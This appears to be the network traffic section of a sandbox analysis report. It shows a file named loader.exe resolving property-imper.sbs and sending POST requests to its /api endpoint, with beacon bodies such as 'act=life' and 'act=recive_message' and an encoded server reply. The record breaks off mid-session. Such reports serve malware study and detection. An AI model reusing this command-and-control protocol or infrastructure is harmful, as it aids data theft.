                                                                                    Nov 23, 2024 14:09:34.434770107 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:34.434854031 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:34.434870958 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:35.322417021 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:35.322520018 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:35.322583914 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:35.322706938 CET49734443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:35.322755098 CET44349734172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:35.652976990 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:35.653018951 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:35.653156996 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:35.653496981 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:35.653517962 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:36.965910912 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:36.966027021 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:36.967483044 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:36.967489004 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:36.967770100 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:36.969453096 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:36.969562054 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:36.969567060 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:37.672019005 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:37.672132969 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:37.672210932 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:37.672302008 CET49735443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:37.672312975 CET44349735172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:38.235342979 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:38.235429049 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:38.235512972 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:38.235805035 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:38.235837936 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.553476095 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.553577900 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.555393934 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.555440903 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.556474924 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.558187008 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.559175968 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.559222937 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.559377909 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.559421062 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.559575081 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.559638023 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.559837103 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.559885979 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.560075045 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.560125113 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.560353041 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.560396910 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.560416937 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.560444117 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.560622931 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.560662031 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.560710907 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.560807943 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.560849905 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.603349924 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.603564978 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.603632927 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.603682995 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.603717089 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:39.603805065 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:39.603843927 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:41.909579992 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:41.909821033 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:41.909913063 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:41.909997940 CET49736443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:41.910058975 CET44349736172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:41.956600904 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:41.956633091 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:41.956715107 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:41.957288027 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:41.957303047 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.271825075 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.271902084 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.274040937 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.274050951 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.275067091 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.276628971 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.276650906 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.276787043 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.985305071 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.985543013 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.985651970 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.985759974 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.985809088 CET44349738172.67.162.84192.168.2.4
                                                                                    Nov 23, 2024 14:09:43.985837936 CET49738443192.168.2.4172.67.162.84
                                                                                    Nov 23, 2024 14:09:43.985855103 CET44349738172.67.162.84192.168.2.4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2024 14:09:24.116719007 CET6251353192.168.2.41.1.1.1
                                                                                    Nov 23, 2024 14:09:24.257682085 CET53625131.1.1.1192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 23, 2024 14:09:24.116719007 CET192.168.2.41.1.1.10x64adStandard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 23, 2024 14:09:24.257682085 CET1.1.1.1192.168.2.40x64adNo error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false
                                                                                    Nov 23, 2024 14:09:24.257682085 CET1.1.1.1192.168.2.40x64adNo error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                    • property-imper.sbs
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449730172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:25 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-11-23 13:09:26 UTC1026INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=0v69jdlj4livqv07coq7movdd9; expires=Wed, 19-Mar-2025 06:56:05 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2DD6YDe%2FGroBFYO7O%2BHK04cgqUX445vVpGUdQUmmVT%2F945Q0bFBOBxnNvxP%2BbRnRqmsWj%2BXg%2FhGKBh3g%2FXsf3I%2B3ppB%2BNqulIwjft7uGIgBIx2ZKwiksUZJw66C2h31b2d2%2Fgk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7164c44e730c9e-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1649&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1712609&cwnd=32&unsent_bytes=0&cid=d85c5b7373718b22&ts=728&x=0"
                                                                                    2024-11-23 13:09:26 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-11-23 13:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449731172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:27 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 52
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 13:09:27 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 30 36 37 38 33 38 38 34 37 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--5067838847&j=
                                                                                    2024-11-23 13:09:28 UTC1013INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 13:09:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=nvd01sta0cfmkhqlfr215f9fpm; expires=Wed, 19-Mar-2025 06:56:07 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mb59iwJkXRtHSYwypj8%2FUOKLvBd7idQmGNIKTIaKXkIq5gwDvlqo0AtDxhMU4A9Dd%2B%2FSRftdrFFFPF91pGnAHOc7cJS8VOGrFyspBxmXTl52zjSmhPPNILWbZ0DdoHLnZuZ066c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7164d11a9c1a28-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1894&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=1576673&cwnd=138&unsent_bytes=0&cid=fac65fa60c381f80&ts=728&x=0"
                                                                                    2024-11-23 13:09:28 UTC356INData Raw: 31 64 61 37 0d 0a 35 68 61 58 33 73 76 64 38 76 37 6f 72 36 49 63 70 38 68 71 55 6d 47 64 41 4a 4b 54 4b 57 68 43 34 59 65 69 76 6d 48 5a 6e 49 57 64 4e 4f 48 38 38 65 6e 65 33 4a 76 4b 67 43 62 54 75 68 38 33 54 62 39 68 39 72 45 54 44 69 4f 4e 39 4d 65 53 51 36 2f 78 70 39 78 77 39 72 4b 34 75 4e 37 63 6a 64 65 41 4a 76 79 7a 53 44 63 50 76 7a 71 77 39 6b 4d 4b 49 34 33 6c 77 39 55 4f 71 66 44 6d 6a 6e 72 77 74 71 36 2b 6c 70 2b 45 77 73 64 35 77 71 6b 41 50 41 6a 77 61 50 2b 78 42 55 6f 6e 6d 36 57 59 6e 43 79 38 36 4f 53 72 64 2b 53 31 36 61 44 65 68 63 72 4b 7a 44 36 64 36 67 73 33 41 2f 46 6d 39 76 68 42 41 43 71 46 35 4d 62 55 45 62 44 36 37 59 35 30 38 37 65 6b 74 34 4b 53 6a 73 58 4d 66 38 69 70 53 48 35 44 2b 48 71 77 71 51 74 5a 45 6f 44 30 30
                                                                                    Data Ascii: 1da75haX3svd8v7or6Icp8hqUmGdAJKTKWhC4YeivmHZnIWdNOH88ene3JvKgCbTuh83Tb9h9rETDiON9MeSQ6/xp9xw9rK4uN7cjdeAJvyzSDcPvzqw9kMKI43lw9UOqfDmjnrwtq6+lp+Ewsd5wqkAPAjwaP+xBUonm6WYnCy86OSrd+S16aDehcrKzD6d6gs3A/Fm9vhBACqF5MbUEbD67Y5087ekt4KSjsXMf8ipSH5D+HqwqQtZEoD00
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 43 4f 67 73 62 4c 65 39 65 68 41 54 30 4f 2f 32 2f 36 2f 6b 67 4b 4a 34 6e 76 7a 39 59 48 74 76 50 68 68 48 53 31 38 75 6d 34 69 4e 7a 53 6a 65 4e 37 31 61 30 45 4a 6b 48 46 49 75 2b 2f 55 6b 6f 6e 6a 36 57 59 6e 41 75 2b 2f 65 53 50 65 2f 61 30 6f 71 32 51 6a 6f 7a 41 78 57 7a 44 72 77 59 36 41 4f 31 6f 2f 76 64 49 41 79 75 4b 34 4d 66 59 51 2f 57 2b 34 4a 77 30 72 66 79 49 73 70 75 51 67 4e 72 41 50 74 72 6b 45 58 41 45 38 79 4b 6f 73 55 38 4c 4a 49 4c 68 7a 74 49 48 74 2f 6a 70 69 58 76 7a 74 71 6d 34 6d 70 53 43 7a 4d 31 31 79 71 6f 4e 50 51 66 35 62 76 48 30 43 30 52 67 68 50 32 41 68 45 4f 56 2b 65 53 57 4e 73 43 2f 70 37 47 58 69 73 72 53 6a 6d 65 46 72 51 52 77 57 37 39 73 39 66 35 5a 43 7a 4b 47 36 39 4c 51 42 72 33 7a 35 49 70 30 38 4c 75 6b 73
                                                                                    Data Ascii: COgsbLe9ehAT0O/2/6/kgKJ4nvz9YHtvPhhHS18um4iNzSjeN71a0EJkHFIu+/Ukonj6WYnAu+/eSPe/a0oq2QjozAxWzDrwY6AO1o/vdIAyuK4MfYQ/W+4Jw0rfyIspuQgNrAPtrkEXAE8yKosU8LJILhztIHt/jpiXvztqm4mpSCzM11yqoNPQf5bvH0C0RghP2AhEOV+eSWNsC/p7GXisrSjmeFrQRwW79s9f5ZCzKG69LQBr3z5Ip08Luks
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 53 6a 6d 65 46 72 51 52 77 57 37 39 75 2b 66 46 41 41 43 53 44 34 73 33 5a 41 4c 7a 39 36 6f 4e 2b 2b 37 75 74 73 35 6d 52 6a 4d 33 48 65 73 43 34 44 54 6b 50 38 79 4b 2b 73 55 77 53 59 4e 75 6c 37 39 73 56 75 4e 48 6b 6c 58 32 31 6f 2b 65 6d 30 4a 75 47 6a 5a 67 2b 77 71 38 41 4f 77 58 33 59 75 4c 30 52 51 45 68 69 65 50 42 30 51 2b 39 2f 75 61 45 63 76 6d 38 72 72 69 43 6a 6f 2f 4c 30 6e 53 46 35 45 67 33 47 37 38 36 73 4d 64 62 48 54 47 56 70 2f 58 66 44 62 58 35 38 63 52 72 75 36 58 70 75 4a 7a 63 30 6f 33 4c 66 73 6d 74 41 44 59 48 39 32 33 2f 2b 46 6b 4c 4c 49 33 33 78 39 77 4b 74 66 48 72 6a 58 6e 79 73 61 4b 31 6e 5a 69 4e 7a 49 41 77 68 61 30 51 63 46 75 2f 56 4f 44 38 52 79 51 72 6a 2b 79 41 77 30 32 69 76 75 43 49 4e 4b 33 38 72 62 4f 59 6c 6f
                                                                                    Data Ascii: SjmeFrQRwW79u+fFAACSD4s3ZALz96oN++7uts5mRjM3HesC4DTkP8yK+sUwSYNul79sVuNHklX21o+em0JuGjZg+wq8AOwX3YuL0RQEhiePB0Q+9/uaEcvm8rriCjo/L0nSF5Eg3G786sMdbHTGVp/XfDbX58cRru6XpuJzc0o3LfsmtADYH923/+FkLLI33x9wKtfHrjXnysaK1nZiNzIAwha0QcFu/VOD8RyQrj+yAw02ivuCINK38rbOYlo
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 77 61 30 4d 4e 67 79 2f 4c 4c 44 32 55 30 70 34 77 38 72 6e 36 55 47 61 78 4b 65 62 4f 75 7a 38 72 72 50 51 78 4d 72 42 77 33 4c 4e 70 51 34 35 44 2f 56 72 2b 2f 31 41 44 69 79 4b 34 4d 62 64 42 72 37 2f 34 34 68 2b 38 37 2b 71 73 4a 2b 54 67 6f 32 4f 50 73 4b 79 53 47 68 44 32 6e 58 37 2f 30 31 4b 50 38 33 38 67 4e 73 50 2b 36 61 6e 69 48 33 7a 75 71 79 7a 6b 5a 71 43 79 4d 68 36 78 4b 77 4f 4d 77 7a 37 5a 2f 48 2b 54 77 59 75 69 65 54 42 30 41 69 30 39 65 4c 45 4f 72 57 37 73 66 2f 49 33 4c 76 4f 31 6d 6e 56 70 6b 67 76 54 65 59 69 39 2f 30 4c 55 6d 43 43 39 38 72 57 44 62 37 78 34 6f 64 37 38 72 47 76 73 35 71 56 67 73 76 50 64 39 65 70 42 44 34 45 38 57 37 2b 2f 45 45 4a 4c 63 4f 72 67 4e 73 62 2b 36 61 6e 71 48 50 34 6b 71 4b 7a 6c 39 79 56 67 39 6b
                                                                                    Data Ascii: wa0MNgy/LLD2U0p4w8rn6UGaxKebOuz8rrPQxMrBw3LNpQ45D/Vr+/1ADiyK4MbdBr7/44h+87+qsJ+Tgo2OPsKySGhD2nX7/01KP838gNsP+6aniH3zuqyzkZqCyMh6xKwOMwz7Z/H+TwYuieTB0Ai09eLEOrW7sf/I3LvO1mnVpkgvTeYi9/0LUmCC98rWDb7x4od78rGvs5qVgsvPd9epBD4E8W7+/EEJLcOrgNsb+6anqHP4kqKzl9yVg9k
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 79 68 44 70 79 4c 47 39 6c 73 61 49 38 48 55 31 74 38 56 73 50 50 72 78 47 75 37 70 65 6d 34 6e 4e 7a 53 6a 63 5a 78 7a 4b 6b 48 4d 51 72 7a 62 2f 58 34 54 67 73 6d 68 2b 2f 4b 33 41 57 39 2f 2b 4b 4f 64 2f 53 32 6f 4c 69 59 6d 34 6e 66 67 44 43 46 72 52 42 77 57 37 39 4c 39 2b 4e 46 47 6d 43 63 71 39 6d 63 42 4c 65 2b 76 38 52 77 2f 37 4f 74 75 4a 79 61 6a 38 76 4e 66 38 71 72 43 44 38 48 39 47 76 32 38 45 59 50 4c 59 66 33 79 74 63 4d 74 2f 66 72 69 54 53 37 2f 4b 36 6e 30 4d 54 4b 2f 4d 31 77 79 36 30 65 63 42 79 78 65 37 44 32 52 30 70 34 77 2b 54 4d 30 77 43 30 2f 65 53 46 66 75 65 75 70 62 61 59 6d 59 62 47 7a 6e 6a 58 72 41 63 35 41 50 78 72 39 2f 6c 48 41 43 4f 45 70 59 36 63 42 4b 4f 2b 76 38 52 58 34 71 79 6b 2f 34 2f 53 6b 34 33 48 63 6f 58 79
                                                                                    Data Ascii: yhDpyLG9lsaI8HU1t8VsPPrxGu7pem4nNzSjcZxzKkHMQrzb/X4Tgsmh+/K3AW9/+KOd/S2oLiYm4nfgDCFrRBwW79L9+NFGmCcq9mcBLe+v8Rw/7OtuJyaj8vNf8qrCD8H9Gv28EYPLYf3ytcMt/friTS7/K6n0MTK/M1wy60ecByxe7D2R0p4w+TM0wC0/eSFfueupbaYmYbGznjXrAc5APxr9/lHACOEpY6cBKO+v8RX4qyk/4/Sk43HcoXy
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 70 6b 2f 2f 35 43 41 79 53 4c 35 73 44 59 42 37 7a 37 35 49 68 2f 38 72 2b 6d 75 35 6d 53 67 38 4b 41 4d 49 57 74 45 48 42 62 76 30 50 72 38 6b 63 48 59 4a 79 72 32 5a 77 45 74 37 36 2f 78 48 6a 37 75 61 6d 31 6c 70 69 50 79 38 70 37 78 61 45 4c 50 77 66 35 5a 76 2f 78 51 41 4d 68 68 65 44 4b 31 77 57 32 2f 65 47 43 4e 4c 76 38 72 71 66 51 78 4d 72 74 32 33 50 4a 72 55 67 76 54 65 59 69 39 2f 30 4c 55 6d 43 49 36 63 54 62 41 37 62 39 37 34 46 77 2f 37 6d 70 74 34 4b 55 69 73 72 53 62 4d 57 6a 44 54 77 41 2f 32 62 32 2b 45 30 4a 4a 4d 4f 72 67 4e 73 62 2b 36 61 6e 71 58 6a 79 6c 61 36 6b 30 49 50 45 31 49 42 35 79 65 70 51 63 41 4c 30 61 50 2f 38 53 41 77 6a 69 4f 44 4b 33 51 53 7a 38 2f 57 48 65 2f 71 34 71 62 43 57 6d 6f 76 43 78 6e 6e 4d 71 77 41 33 51
                                                                                    Data Ascii: pk//5CAySL5sDYB7z75Ih/8r+mu5mSg8KAMIWtEHBbv0Pr8kcHYJyr2ZwEt76/xHj7uam1lpiPy8p7xaELPwf5Zv/xQAMhheDK1wW2/eGCNLv8rqfQxMrt23PJrUgvTeYi9/0LUmCI6cTbA7b974Fw/7mpt4KUisrSbMWjDTwA/2b2+E0JJMOrgNsb+6anqXjyla6k0IPE1IB5yepQcAL0aP/8SAwjiODK3QSz8/WHe/q4qbCWmovCxnnMqwA3Q
                                                                                    2024-11-23 13:09:28 UTC398INData Raw: 57 58 51 41 6e 6b 2b 4c 58 30 30 50 31 76 75 6a 45 4c 4d 7a 38 6f 4c 69 4c 6a 5a 7a 41 30 48 6d 46 6c 55 5a 77 47 37 38 36 73 4d 52 49 42 43 36 45 38 39 47 52 4a 4b 33 30 34 4a 52 7a 34 72 50 70 38 64 43 61 79 70 57 54 4d 49 57 75 47 58 42 62 72 7a 43 72 70 42 68 64 63 4e 48 36 6a 73 56 44 72 62 36 2f 31 6a 71 31 72 75 6e 6e 30 4e 75 4a 33 39 4a 34 78 72 77 4c 64 7a 33 42 52 65 72 38 54 52 30 78 76 64 76 48 78 67 36 39 36 66 62 49 59 66 61 79 70 37 69 47 33 4d 53 4e 7a 7a 36 64 6b 30 68 34 51 38 41 73 73 4f 6b 4c 55 6d 43 32 35 73 37 53 42 4b 33 76 71 71 4e 75 2b 4c 71 2b 72 74 44 53 79 73 75 41 4a 70 58 6b 53 44 51 53 76 7a 71 67 6f 78 42 66 63 39 53 31 6b 73 4e 4e 6f 72 37 78 78 43 79 6e 38 75 6d 74 30 4d 54 4b 69 73 4e 73 31 36 77 4c 4a 67 43 34 58 4d
                                                                                    Data Ascii: WXQAnk+LX00P1vujELMz8oLiLjZzA0HmFlUZwG786sMRIBC6E89GRJK304JRz4rPp8dCaypWTMIWuGXBbrzCrpBhdcNH6jsVDrb6/1jq1runn0NuJ39J4xrwLdz3BRer8TR0xvdvHxg696fbIYfayp7iG3MSNzz6dk0h4Q8AssOkLUmC25s7SBK3vqqNu+Lq+rtDSysuAJpXkSDQSvzqgoxBfc9S1ksNNor7xxCyn8umt0MTKisNs16wLJgC4XM
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 32 36 63 35 0d 0a 31 76 4e 61 53 65 65 57 2f 72 4c 69 75 6f 6f 54 4b 31 48 6e 4c 72 41 68 77 54 62 39 74 73 4b 6c 79 53 6d 6a 44 32 6f 36 63 47 2f 75 6d 70 37 46 33 2b 37 4b 75 71 59 48 52 71 64 76 4e 63 63 36 72 53 48 35 44 2b 53 4b 6f 6f 51 56 4b 4a 4a 4b 6c 6d 49 78 52 34 4b 75 30 30 79 53 6e 6f 2b 65 6d 30 49 72 4b 6c 5a 49 77 68 62 68 49 61 45 4f 34 62 50 33 77 53 41 51 6a 6b 66 66 47 33 78 57 34 75 64 6d 36 56 66 69 33 70 62 4b 66 6c 37 54 7a 34 58 50 4f 70 67 55 2f 43 4d 46 63 35 66 4a 46 42 43 65 56 39 49 43 53 51 37 53 2b 76 37 30 30 76 66 79 57 38 64 43 45 79 70 57 41 53 38 61 6b 42 6a 63 56 37 69 2f 52 2f 45 41 47 4c 59 7a 75 67 4a 4a 44 76 62 36 2f 31 44 71 31 75 4c 6a 2f 79 4d 7a 59 6c 70 55 74 6b 76 70 61 4c 30 33 6d 49 75 61 78 45 31 68 75
                                                                                    Data Ascii: 26c51vNaSeeW/rLiuooTK1HnLrAhwTb9tsKlySmjD2o6cG/ump7F3+7KuqYHRqdvNcc6rSH5D+SKooQVKJJKlmIxR4Ku00ySno+em0IrKlZIwhbhIaEO4bP3wSAQjkffG3xW4udm6Vfi3pbKfl7Tz4XPOpgU/CMFc5fJFBCeV9ICSQ7S+v700vfyW8dCEypWAS8akBjcV7i/R/EAGLYzugJJDvb6/1Dq1uLj/yMzYlpUtkvpaL03mIuaxE1hu
                                                                                    2024-11-23 13:09:28 UTC1369INData Raw: 51 36 2b 37 61 6e 75 7a 71 31 70 4f 6e 6e 30 4b 6d 4a 77 38 35 35 30 37 74 46 46 52 54 38 63 76 62 79 43 30 52 67 68 61 57 59 6a 45 33 37 2b 76 62 45 4c 4b 58 75 38 75 72 44 79 39 71 66 33 7a 44 63 36 68 35 77 57 36 30 73 73 4f 4d 4c 55 6d 44 45 35 74 4c 4f 42 62 6a 6f 35 4d 4e 4b 79 35 71 71 72 70 71 39 68 39 33 48 51 50 75 2f 43 7a 34 4e 2b 48 54 68 73 51 56 4b 4c 38 4f 39 2b 5a 78 4c 39 2f 6a 6b 6b 6a 54 4b 38 75 6d 6e 30 4d 54 4b 2b 4d 4e 77 79 36 30 65 49 55 37 5a 59 65 48 37 61 67 63 77 68 4b 57 4f 6e 41 58 37 70 72 54 4b 4e 50 47 74 36 65 66 41 7a 74 47 59 6b 79 6d 56 2b 42 64 2b 47 72 39 30 73 4b 6b 5a 52 47 43 52 70 5a 69 63 52 4c 6a 73 39 59 4a 33 34 37 2f 75 67 61 36 70 69 63 50 4f 65 64 4f 66 43 79 45 41 2f 32 6e 4f 7a 32 6f 45 4b 34 54 70 31
                                                                                    Data Ascii: Q6+7anuzq1pOnn0KmJw85507tFFRT8cvbyC0RghaWYjE37+vbELKXu8urDy9qf3zDc6h5wW60ssOMLUmDE5tLOBbjo5MNKy5qqrpq9h93HQPu/Cz4N+HThsQVKL8O9+ZxL9/jkkjTK8umn0MTK+MNwy60eIU7ZYeH7agcwhKWOnAX7prTKNPGt6efAztGYkymV+Bd+Gr90sKkZRGCRpZicRLjs9YJ347/uga6picPOedOfCyEA/2nOz2oEK4Tp1


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449732172.67.162.844437372C:\Users\user\Desktop\loader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 13:09:29 UTC277OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
